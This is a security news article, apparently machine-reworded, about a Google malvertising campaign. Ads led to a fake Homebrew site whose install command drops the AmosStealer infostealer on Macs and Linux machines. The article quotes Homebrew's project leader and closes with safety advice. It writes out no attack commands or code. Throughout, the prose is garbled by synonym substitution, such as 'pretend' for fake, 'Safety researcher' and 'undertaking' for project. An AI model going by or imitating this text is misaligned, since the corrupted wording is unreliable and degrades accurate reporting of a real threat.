Hackers are as soon as once more abusing Google adverts to unfold malware, utilizing a pretend Homebrew web site to contaminate Macs and Linux units with an infostealer that steals credentials, browser information, and cryptocurrency wallets.
The malicious Google adverts marketing campaign was noticed by Ryan Chenkie, who warned on X in regards to the threat of malware an infection.
The malware used on this marketing campaign is AmosStealer (aka ‘Atomic’), an infostealer designed for macOS techniques and offered to cyber criminals as a subscription of $1,000/month.
The malware was seen just lately in different malvertising campaigns selling pretend Google Meet conferencing pages and is at present the go-to stealer for cybercriminals concentrating on Apple customers.
Concentrating on Homebrew customers
Homebrew is a well-liked open-source bundle supervisor for macOS and Linux, permitting customers to put in, replace, and handle software program from the command line.
A malicious Google commercial displayed the right Homebrew URL, “brew.sh,” tricking even acquainted customers into clicking it. Nonetheless, the advert redirected them to a pretend Homebrew web site hosted at “brewe.sh” as an alternative.
Malvertisers have extensively used this URL approach to trick customers into clicking on what appears to be the official web site for a undertaking or group.
Upon reaching the positioning, the customer is prompted to put in Homebrew by pasting a command proven within the macOS Terminal or a Linux shell immediate. The official Homebrew web site offers the same command to execute to put in the official software program.
Nonetheless, when working the command proven by the pretend web site, it is going to obtain and execute malware on the machine.
Safety researcher JAMESWT discovered that the malware dropped on this case [VirusTotal] is Amos, a robust infostealer that targets over 50 cryptocurrency extensions, desktop wallets, and information saved on internet browsers.
Homebrew’s undertaking chief, Mike McQuaid, acknowledged that the undertaking is conscious of the state of affairs however highlighted that it is past its management, criticizing Google for its lack of scrutiny.
“Mac Homebrew Project Leader here. This seems taken down now,” tweeted McQuaid.
“There’s little we can do about this really, it keeps happening again and again and Google seems to like taking money from scammers. Please signal-boost this and hopefully someone at Google will fix this for good.”
On the time of writing, the malicious advert has been taken down, however the marketing campaign might proceed through different redirection domains, so Homebrew customers should be cautious of sponsored adverts for the undertaking.
Sadly, malicious adverts proceed to be an issue in Google Search outcomes for numerous search phrases, even for Google Adverts itself.
In that marketing campaign, the risk actors focused Google advertisers to steal their accounts and run malicious campaigns below the guise of official and verified entities.
To attenuate the chance of malware an infection, at any time when clicking on a hyperlink in Google, guarantee that you’re delivered to the official web site for a undertaking or firm earlier than coming into delicate info or downloading software program.
One other secure technique is to bookmark official undertaking web sites it’s essential to go to typically for sourcing software program and use these as an alternative of looking out on-line each time.
